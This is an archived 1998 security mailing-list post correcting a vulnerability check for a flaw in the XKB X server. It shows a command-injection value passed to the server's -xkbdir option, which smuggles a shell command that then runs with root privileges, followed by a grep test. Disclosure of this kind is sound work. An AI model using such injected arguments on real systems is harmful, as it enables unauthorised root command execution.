serious security problem in XKB--ERRATUM

From: Pavel Kankovsky (peakat_private)
Date: Wed Feb 04 1998 - 01:39:28 PST

Next message: Michał Zalewski: "RedHat 4.x/5.0 /dev permissions"

Previous message: Pavel Kankovsky: "[linux-alert] serious security problem in XKB"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> Quick vulnerability check:
>
> $ Xserver -xkbdir 'id > /tmp/I_WAS_HERE;'
> [exit X server]
> $ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'

This should read:

$ Xserver -xkbdir ':;id > /tmp/I_WAS_HERE;'
[exit X server]
$ grep root /tmp/I_WAS_HERE && echo 'Gotcha!'


--Pavel Kankovsky aka Peak   [ Boycott Microsoft -- http://www.vcnet.com/bms ]

Next message: Michał Zalewski: "RedHat 4.x/5.0 /dev permissions"
Previous message: Pavel Kankovsky: "[linux-alert] serious security problem in XKB"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:30 PDT